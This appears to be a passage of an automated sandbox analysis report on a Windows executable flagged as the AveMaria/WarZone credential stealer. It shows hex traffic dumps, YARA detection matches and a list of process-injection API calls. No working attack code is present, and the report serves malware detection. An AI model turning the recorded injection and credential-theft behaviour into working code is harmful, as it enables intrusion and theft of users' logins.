40 03 c4 61 c4 5d a0 93 13 0e 3a ac 50 25 34 90 ed 46 a9 1d df 09 ff 47 8b 8c e6 88 e6 23 9e 10 79 e5 cd c7 35 0e 73 da da ec 02 eb 06 23
                                                                  Data Ascii: }w`Y"w]3s6mC.8.g&j6>@`Rw~7VDqzn7sykYPQIf3#{6YFTp|wU)x6g<WO>G/-q4R\C{I%=q&}@5IZ7v03DS8@a]:P%4FG#y5s#
                                                                  2021-10-14 10:20:58 UTC448INData Raw: 5d 63 52 57 b6 03 a0 83 41 86 b1 01 98 93 0c c0 e8 c9 18 bd fe bb 17 28 19 98 5e 20 78 1d 28 7e a8 db c6 e4 94 8c a9 2c 82 cd c9 a4 fa a7 3d ba 0f 83 95 96 c0 9d 22 7e 6c 6d 45 3f 00 5d c2 84 ce 86 b4 47 2e 54 54 20 0b 6c 63 4c 35 6e 10 a7 56 48 c7 fb 2b a0 39 74 87 98 89 83 13 7b 08 49 c8 37 c3 29 ed 16 0f 35 9a 10 21 bd aa 60 70 82 2f ff 4a 54 f7 3c 9d 59 49 37 4e cc 19 12 ba ab 8b 26 d6 a7 2f fc 12 e5 83 b9 70 a5 8a ca 8f e4 5d 9a 1e 15 9a 05 ff aa 5e 36 4a 0b 27 37 ff bb a6 0c 13 5f 22 58 d5 10 c1 64 14 68 8a d6 96 48 2a 59 f3 89 e5 0e 1b f6 2f c2 4f 95 bc e4 37 c8 d2 89 88 88 5d f7 0a 56 cd 69 93 1a 07 0d 8e ab cf ec ab d0 28 71 fd 93 83 e9 ad 91 ba 52 c0 cb 1b 9f 11 d6 f3 af 07 27 0b db b1 11 81 d2 6a 4f b6 e7 0e 2f f8 99 a0 e7 e3 0a 7a 86 88 ed 14
                                                                  Data Ascii: ]cRWA(^ x(~,="~lmE?]G.TT lcL5nVH+9t{I7)5!`p/JT<YI7N&/p]^6J'7_"XdhH*Y/O7]Vi(qR'jO/z
                                                                  2021-10-14 10:20:58 UTC464INData Raw: 9b 9b 14 48 4e 63 97 7b 35 b3 76 4c e5 a7 5a 9d 9b f3 b7 b3 8f 26 65 6a 29 e6 c4 17 1c 1c 97 f9 52 5b 58 b2 25 c4 7f 1f 05 2b 97 9e 54 a9 c0 41 1d b9 54 6c 43 5a 97 f7 63 b4 d5 5b fe 96 de 9b c2 1b 08 eb 97 7f cf ff 2f c7 b1 be 8b 9f a9 53 0e ff 47 3c 3c 61 42 bb d8 53 5c b1 7b fd 2e f8 dd 9a 1a 08 78 65 e9 a0 c9 52 e1 8a 43 8b a1 8b ba b1 a0 5e 71 9f 83 18 9d 3c 77 08 a4 e1 9f a5 67 5b 0f 4a c7 2a fd a3 7b 50 85 cf da 17 a1 3d e9 58 1a 6c bb 9e 01 2c 93 df 06 18 69 68 e5 27 c3 30 9b 1c b3 b5 37 e3 a0 7c 28 3f 06 e3 10 c8 6d a6 a4 3b 01 20 bb eb e5 4e 2b bf ea 1c b0 50 8c 44 db 5b 72 f1 6b a4 2b 6d c8 14 73 30 a1 9c 14 f7 ac dd 9e 99 31 a5 fb 6c d0 14 a4 f2 71 3e 87 e4 dc 32 81 f3 1f 43 aa 41 5d ac 22 5b 8d c3 b6 a7 c9 ce 05 bc 1e a0 9b 37 88 e3 8a 7e c6
                                                                  Data Ascii: HNc{5vLZ&ej)R[X%+TATlCZc[/SG<<aBS\{.xeRC^q<wg[J*{P=Xl,ih'07|(?m; N+PD[rk+ms01lq>2CA]"[7~
                                                                  2021-10-14 10:20:58 UTC480INData Raw: df de 05 1d dc 23 76 a3 05 77 99 4a a0 ba c7 89 81 91 48 01 f7 0f 2a 2c 09 dd b4 af 92 5b b3 b8 e0 cc 1d 80 62 f2 1a ec f4 5b 68 cd de 6f 84 e7 f1 ca 06 77 cb 4c 65 a8 15 8c c2 ef 26 57 9d c3 8d f1 8c 6a 02 d6 2a cd 39 34 4c a8 a5 92 d3 6f 17 1e 3c 1c 44 86 94 31 73 95 48 24 0c c9 6d 6e be 9e f8 6b 2a 15 16 5b 55 68 a7 c9 74 60 22 a1 03 11 ed 9c 75 81 35 a0 83 e4 51 9b fb 1d 51 15 1a 08 88 c6 fe 07 96 5e 8d b3 9f cd ef 37 64 bb 0e 10 11 79 4c a5 29 b3 d8 6c 4e ae e5 3f 39 62 cc 67 ca 00 bd 9b f3 c4 f3 57 01 80 e5 88 f9 04 1c 52 92 d9 44 74 58 6b af b7 06 d8 54 fd 56 c4 81 d5 fd b6 10 1e ac c3 bb 30 ca e9 05 c0 b8 17 8f 26 31 75 2c 6b 77 90 f1 ee 19 03 5d a8 d3 28 da 79 00 70 6c 2e 73 7b 37 6c bc 8c ae f3 2a 3d f3 7f 40 10 c7 71 ee 50 01 06 5a 9e 79 e4 2b
                                                                  Data Ascii: #vwJH*,[b[howLe&Wj*94Lo<D1sH$mnk*[Uht`"u5QQ^7dyL)lN?9bgWRDtXkTV0&1u,kw](ypl.s{7l*=@qPZy+
                                                                  2021-10-14 10:20:58 UTC496INData Raw: e4 12 fe d2 84 e1 58 71 e3 26 f0 be c6 fb 63 f1 bf 0f 09 cf 8e e1 75 1c 21 94 0b 64 c3 53 05 b0 93 e6 ff 0b 2c 29 a7 50 3c 30 3f 65 d0 3a cc fb f5 b2 39 fd dd e6 d3 7d 6a 54 5e 8f 12 53 09 10 ad be f6 1e 08 b6 84 76 ff 84 f9 de 64 89 f9 2c 76 84 42 35 0e 6d 3c 43 e9 2c 83 95 63 32 af 60 97 2f 38 f9 0c b4 e2 9b 89 93 e2 c5 a6 ca 9d fe b4 f7 a3 e4 a9 7e c9 31 2b c4 73 08 76 4b 8e dc 63 f1 b6 1f c3 9f 5c b5 c5 c5 9c 57 f6 d3 0f a6 c8 01 2d 0d f4 ef 66 76 23 20 0c 52 d3 14 1d 4a 44 45 ab bf 14 c7 7a ed 61 be 9d 3f 1a 68 5f 3a 68 b1 04 65 6d b1 33 df cb 39 09 f7 91 7c b5 9d ee 3f fb 7d 14 04 15 a9 b5 da 23 fb f2 3c 43 46 9b 3c 5c b4 a2 90 d9 02 fb 70 cf 72 eb c9 14 02 b2 08 cc 83 f4 1f 5c d1 0a 26 c0 7c 88 49 86 e3 93 8f 30 5d 0f 80 1c 46 ba c2 73 eb c8 b8 e7
                                                                  Data Ascii: Xq&cu!dS,)P<0?e:9}jT^Svd,vB5m<C,c2`/8~1+svKc\W-fv# RJDEza?h_:hem39|?}#<CF<\pr\&|I0]Fs
                                                                  2021-10-14 10:20:58 UTC512INData Raw: 29 44 39 68 a5 c3 f7 90 8d df 63 a6 08 94 cb 6b fe d6 47 10 69 cf 53 3e d8 95 8b 7b 03 50 9b 32 6d 74 1f 4f 48 c6 df 58 e6 46 a3 62 d0 33 7c 23 ad 21 a7 cc 42 37 c9 7f ec 39 f9 a5 9d 63 9a 31 50 8a 48 73 fb 95 6e 95 b6 05 9e 22 d5 c6 f3 7d 8b 46 12 2a 7a 91 3e a9 b7 bb 1c 71 b4 e3 71 c2 a6 d6 3c f4 b5 e1 9e c5 ef e4 b2 9a 8d 81 a3 73 e2 93 2a b1 4f f1 a1 8a 4c b2 ae 5b 28 cf 89 c9 1d 1e d2 8b 5f 09 42 fe 32 3a 51 3e 26 9a 08 ca 76 d6 32 d7 d9 62 d3 ec e8 e0 cf 37 00 37 03 18 f0 6a 5f 8b 3c 17 6c fd 3b da 26 6c 4d ff d3 bb 7f fb e6 ed a3 87 7f 04 9d c8 7b 39 9b fe 4c 98 b0 85 cb 0c 66 15 17 62 a5 fd 30 01 ca fa b8 5b 7f fd 63 d8 f3 a4 f2 7e d8 81 ce 7c c7 f7 e3 80 d5 d9 b9 25 e7 03 f0 2d df 96 ca 78 a9 93 f4 dd 92 17 3b 1a 94 ad 6b e0 f1 eb ae 40 82 4b 31
                                                                  Data Ascii: )D9hckGiS>{P2mtOHXFb3|#!B79c1PHsn"}F*z>qq<s*OL[(_B2:Q>&v2b77j_<l;&lM{9Lfb0[c~|%-x;k@K1
                                                                  2021-10-14 10:20:58 UTC528INData Raw: 66 39 0a be b1 b2 bf 4d c1 9d 8f 86 58 91 d9 b4 b8 84 97 59 c2 ee 29 5e 15 59 b6 d8 13 f1 e2 b2 6d 9c a6 5a 28 57 eb 53 ea f4 7c b8 20 db 00 ff 96 bf 5d bb d2 d3 a8 cb 33 5b 21 66 f1 37 a0 1a 6f 3e 71 96 9d 40 0c 3c 92 28 e2 56 d0 e3 37 b6 ad df 76 83 56 12 5c b6 65 b4 99 00 da cd 46 62 c6 4f 94 35 21 36 cb f5 80 93 ca 6e c9 29 f7 64 76 d4 02 84 9d 97 a9 09 fc 03 91 63 15 07 69 c2 b4 4f 83 25 72 b0 ff d0 7c e4 2c 0a 2a 3d f6 b4 66 65 49 f5 9c cc 9a 52 b2 fe 06 26 a3 65 8d 20 aa fb a5 03 96 92 ec ae 97 17 56 c3 10 7c 65 eb 64 50 34 12 af 6d 63 a0 3e b6 00 6f 64 f3 b6 ac 14 02 4a e3 22 36 16 d9 19 19 24 df 1f 22 92 29 6b 9f d5 cb dc 7c 86 99 4b 89 84 12 0b 74 26 1a 31 7e a4 89 2a 01 58 09 fb 47 0f 6b 89 83 b7 52 7e 8b 43 b2 91 3b 63 d1 b8 c3 16 a2 af 5c 09


                                                                  System Behavior

                                                                  General

                                                                  Start time:12:20:36
                                                                  Start date:14/10/2021
                                                                  Path:C:\Users\user\Desktop\hesaphareketi-01.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Users\user\Desktop\hesaphareketi-01.exe'
                                                                  Imagebase:0x320000
                                                                  File size:33792 bytes
                                                                  MD5 hash:38E162610466DD251D9B377A60F65C11
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Yara matches:
                                                                  • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000002.372661566.0000000003681000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000000.00000002.372661566.0000000003681000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.372661566.0000000003681000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000002.372661566.0000000003681000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000002.372473445.00000000026B7000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000000.00000002.372473445.00000000026B7000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.372473445.00000000026B7000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000002.372473445.00000000026B7000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000002.372592569.0000000003609000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000000.00000002.372592569.0000000003609000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.372592569.0000000003609000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000002.372592569.0000000003609000.00000004.00000001.sdmp, Author: Joe Security
                                                                  Reputation:low

                                                                  General

                                                                  Start time:12:21:36
                                                                  Start date:14/10/2021
                                                                  Path:C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe
                                                                  Imagebase:0x1e0000
                                                                  File size:33792 bytes
                                                                  MD5 hash:38E162610466DD251D9B377A60F65C11
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Antivirus matches:
                                                                  • Detection: 100%, Joe Sandbox ML
                                                                  • Detection: 31%, Virustotal
                                                                  Reputation:low

                                                                  General

                                                                  Start time:12:21:37
                                                                  Start date:14/10/2021
                                                                  Path:C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe
                                                                  Imagebase:0x2d0000
                                                                  File size:33792 bytes
                                                                  MD5 hash:38E162610466DD251D9B377A60F65C11
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low

                                                                  General

                                                                  Start time:12:21:37
                                                                  Start date:14/10/2021
                                                                  Path:C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe
                                                                  Imagebase:0x950000
                                                                  File size:33792 bytes
                                                                  MD5 hash:38E162610466DD251D9B377A60F65C11
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000011.00000003.375307414.0000000000EC7000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000011.00000003.375307414.0000000000EC7000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000011.00000003.375440152.0000000000EC9000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000011.00000003.375440152.0000000000EC9000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000011.00000003.375317154.0000000000EC9000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000011.00000003.375317154.0000000000EC9000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000003.375572565.0000000000EB5000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000011.00000003.375572565.0000000000EB5000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000011.00000002.510453136.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.510453136.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000011.00000002.510453136.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: AveMaria_WarZone, Description: unknown, Source: 00000011.00000002.510453136.0000000000400000.00000040.00000001.sdmp, Author: unknown
                                                                  • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000011.00000003.375283442.0000000000EBA000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000011.00000002.510538676.000000000054F000.00000040.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000011.00000002.510538676.000000000054F000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000011.00000003.375468406.0000000000EBA000.00000004.00000001.sdmp, Author: Joe Security
                                                                  Reputation:low

                                                                  Disassembly

                                                                  Code Analysis

                                                                    Executed Functions

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.372259496.0000000000DD0000.00000040.00000001.sdmp, Offset: 00DD0000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: K0F
                                                                    • API String ID: 0-3207597744
                                                                    • Opcode ID: 410b24d467b2d5a861ae51adc00eabc2420f44c65fdf67f8ae0a8602d293a32b
                                                                    • Instruction ID: 317475eff44d279d28fa1898d2564d138d1b9b68c4a1810d4ab74e72e2f3293d
                                                                    • Opcode Fuzzy Hash: 410b24d467b2d5a861ae51adc00eabc2420f44c65fdf67f8ae0a8602d293a32b
                                                                    • Instruction Fuzzy Hash: 50A13A70904209CFDB04CFA9D858BBDBBB1BF89304F14802BE456A7364DB749985DF62
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.372259496.0000000000DD0000.00000040.00000001.sdmp, Offset: 00DD0000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: K0F
                                                                    • API String ID: 0-3207597744
                                                                    • Opcode ID: a0419282fe468a3aa4a973343e9f50ce7cc4a13e24169961dbdb85ada198cf04
                                                                    • Instruction ID: 7019cc6a2c13a56bbd5f86c275f11623552d310ce0b4f8909ea596e0055b111c
                                                                    • Opcode Fuzzy Hash: a0419282fe468a3aa4a973343e9f50ce7cc4a13e24169961dbdb85ada198cf04
                                                                    • Instruction Fuzzy Hash: 60A15C70D04209CFEB04CFA9D848BBDBBB1BB85304F10802BE452A73A4DB749985DF62
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.372259496.0000000000DD0000.00000040.00000001.sdmp, Offset: 00DD0000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 685036c3b59a5443ceab252e43a2f952f1287ee58c45491b21010f392dd68d1c
                                                                    • Instruction ID: 8a52b7db65795cf739a463a86bdef0721e5caf5f0585d71fa3195c5c7cca8654
                                                                    • Opcode Fuzzy Hash: 685036c3b59a5443ceab252e43a2f952f1287ee58c45491b21010f392dd68d1c
                                                                    • Instruction Fuzzy Hash: EAB1D471A05A5DCFDB01CFA9D8895ADBFB1FF4A300B1585DAD484AB212D734D84ACBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.372259496.0000000000DD0000.00000040.00000001.sdmp, Offset: 00DD0000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1b2cc553832465b73c12489a979bc6be86d6966682b02d62f6de2b29f18b319a
                                                                    • Instruction ID: 605f3d244971262793ae162d7442d55a7dca02c28e7a6f772c5cf4ff6902b9e1
                                                                    • Opcode Fuzzy Hash: 1b2cc553832465b73c12489a979bc6be86d6966682b02d62f6de2b29f18b319a
                                                                    • Instruction Fuzzy Hash: 9FA14871E006698BCB14CBA9C8806ADFBF1FF98305F18866AD455E7306D734ED46CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00DDE8BE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.372259496.0000000000DD0000.00000040.00000001.sdmp, Offset: 00DD0000, based on PE: false
                                                                    Similarity
                                                                    • API ID: CreateProcess
                                                                    • String ID:
                                                                    • API String ID: 963392458-0
                                                                    • Opcode ID: b987c1f17e67b53de63cdab99f91cab764dda2d08a1db3a8868cfc77f16a940b
                                                                    • Instruction ID: 7b5d4024644c0d9c551f16d6bac156fe58df17d0ef35deb38dde07690f5d5f51
                                                                    • Opcode Fuzzy Hash: b987c1f17e67b53de63cdab99f91cab764dda2d08a1db3a8868cfc77f16a940b
                                                                    • Instruction Fuzzy Hash: DB913971D002199FDB60DFA8C8817EEBBB2FF48314F14856AD859AB340DB749985CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • K32GetModuleBaseNameA.KERNEL32(?,?,?,?), ref: 05950881
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.373741624.0000000005950000.00000040.00000001.sdmp, Offset: 05950000, based on PE: false
                                                                    Similarity
                                                                    • API ID: BaseModuleName
                                                                    • String ID:
                                                                    • API String ID: 595626670-0
                                                                    • Opcode ID: 3126474d94c8a8b18ae4400487b851011bc79c972065e5fdf7400e3ac40f73d7
                                                                    • Instruction ID: 8fbfbb4c266c9a67efc6b2d378ad40c842b52cca912355cb4f26222f4052ceca
                                                                    • Opcode Fuzzy Hash: 3126474d94c8a8b18ae4400487b851011bc79c972065e5fdf7400e3ac40f73d7
                                                                    • Instruction Fuzzy Hash: CD415470D042489FDB14CFA8C898BDEBBB5BF48324F14C569E95AAB240C7799885CF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • K32GetModuleBaseNameA.KERNEL32(?,?,?,?), ref: 05950881
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.373741624.0000000005950000.00000040.00000001.sdmp, Offset: 05950000, based on PE: false
                                                                    Similarity
                                                                    • API ID: BaseModuleName
                                                                    • String ID:
                                                                    • API String ID: 595626670-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • LoadLibraryA.KERNELBASE(?), ref: 00DDB3C1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.372259496.0000000000DD0000.00000040.00000001.sdmp, Offset: 00DD0000, based on PE: false
                                                                    Similarity
                                                                    • API ID: LibraryLoad
                                                                    • String ID:
                                                                    • API String ID: 1029625771-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CopyFileW.KERNELBASE(?,00000000,?), ref: 00DDBD21
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.372259496.0000000000DD0000.00000040.00000001.sdmp, Offset: 00DD0000, based on PE: false
                                                                    Similarity
                                                                    • API ID: CopyFile
                                                                    • String ID:
                                                                    • API String ID: 1304948518-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 00DDE570
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.372259496.0000000000DD0000.00000040.00000001.sdmp, Offset: 00DD0000, based on PE: false
                                                                    Similarity
                                                                    • API ID: MemoryProcessWrite
                                                                    • String ID:
                                                                    • API String ID: 3559483778-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00DDEB48
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.372259496.0000000000DD0000.00000040.00000001.sdmp, Offset: 00DD0000, based on PE: false
                                                                    Similarity
                                                                    • API ID: MemoryProcessRead
                                                                    • String ID:
                                                                    • API String ID: 1726664587-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • SetThreadContext.KERNELBASE(?,00000000), ref: 00DDE3C6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.372259496.0000000000DD0000.00000040.00000001.sdmp, Offset: 00DD0000, based on PE: false
                                                                    Similarity
                                                                    • API ID: ContextThread
                                                                    • String ID:
                                                                    • API String ID: 1591575202-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • K32EnumProcesses.KERNEL32(00000000,?,?), ref: 059503D3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.373741624.0000000005950000.00000040.00000001.sdmp, Offset: 05950000, based on PE: false
                                                                    Similarity
                                                                    • API ID: EnumProcesses
                                                                    • String ID:
                                                                    • API String ID: 84517404-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • K32EnumProcesses.KERNEL32(00000000,?,?), ref: 059503D3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.373741624.0000000005950000.00000040.00000001.sdmp, Offset: 05950000, based on PE: false
                                                                    Similarity
                                                                    • API ID: EnumProcesses
                                                                    • String ID:
                                                                    • API String ID: 84517404-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • EnumChildWindows.USER32(?,00000000,?), ref: 05950CC0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.373741624.0000000005950000.00000040.00000001.sdmp, Offset: 05950000, based on PE: false
                                                                    Similarity
                                                                    • API ID: ChildEnumWindows
                                                                    • String ID:
                                                                    • API String ID: 3555792229-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • EnumChildWindows.USER32(?,00000000,?), ref: 05950CC0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.373741624.0000000005950000.00000040.00000001.sdmp, Offset: 05950000, based on PE: false
                                                                    Similarity
                                                                    • API ID: ChildEnumWindows
                                                                    • String ID:
                                                                    • API String ID: 3555792229-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • K32EnumProcessModules.KERNEL32(?,?,?,?), ref: 0595072B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.373741624.0000000005950000.00000040.00000001.sdmp, Offset: 05950000, based on PE: false
                                                                    Similarity
                                                                    • API ID: EnumModulesProcess
                                                                    • String ID:
                                                                    • API String ID: 1082081703-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • VirtualProtect.KERNELBASE(?,00000000,?,?), ref: 00DDB623
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.372259496.0000000000DD0000.00000040.00000001.sdmp, Offset: 00DD0000, based on PE: false
                                                                    Similarity
                                                                    • API ID: ProtectVirtual
                                                                    • String ID:
                                                                    • API String ID: 544645111-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • K32EnumProcessModules.KERNEL32(?,?,?,?), ref: 0595072B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.373741624.0000000005950000.00000040.00000001.sdmp, Offset: 05950000, based on PE: false
                                                                    Similarity
                                                                    • API ID: EnumModulesProcess
                                                                    • String ID:
                                                                    • API String ID: 1082081703-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00DDE48E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.372259496.0000000000DD0000.00000040.00000001.sdmp, Offset: 00DD0000, based on PE: false
                                                                    Similarity
                                                                    • API ID: AllocVirtual
                                                                    • String ID:
                                                                    • API String ID: 4275171209-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.372259496.0000000000DD0000.00000040.00000001.sdmp, Offset: 00DD0000, based on PE: false
                                                                    Similarity
                                                                    • API ID: ResumeThread
                                                                    • String ID:
                                                                    • API String ID: 947044025-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.372259496.0000000000DD0000.00000040.00000001.sdmp, Offset: 00DD0000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.372259496.0000000000DD0000.00000040.00000001.sdmp, Offset: 00DD0000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Executed Functions

                                                                    APIs
                                                                      • Part of subcall function 04209340: GetVersionExW.KERNEL32(?,00000000,?,?), ref: 0420938B
                                                                      • Part of subcall function 04209340: GetVersionExW.KERNEL32(?,00000000,?,?), ref: 042093CC
                                                                      • Part of subcall function 04209340: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?), ref: 042093EC
                                                                      • Part of subcall function 04209340: _malloc.LIBCMT ref: 042093F9
                                                                      • Part of subcall function 04209340: _free.LIBCMT ref: 04209408
                                                                    • GetVersionExW.KERNEL32(?,?,00000000,?,?), ref: 0420953B
                                                                      • Part of subcall function 04207760: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000114,75145420,0420908D,00000000,00000000,7519F560), ref: 04207770
                                                                      • Part of subcall function 04207760: _malloc.LIBCMT ref: 0420777C
                                                                      • Part of subcall function 04207760: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 04207796
                                                                      • Part of subcall function 04207760: _free.LIBCMT ref: 042077A1
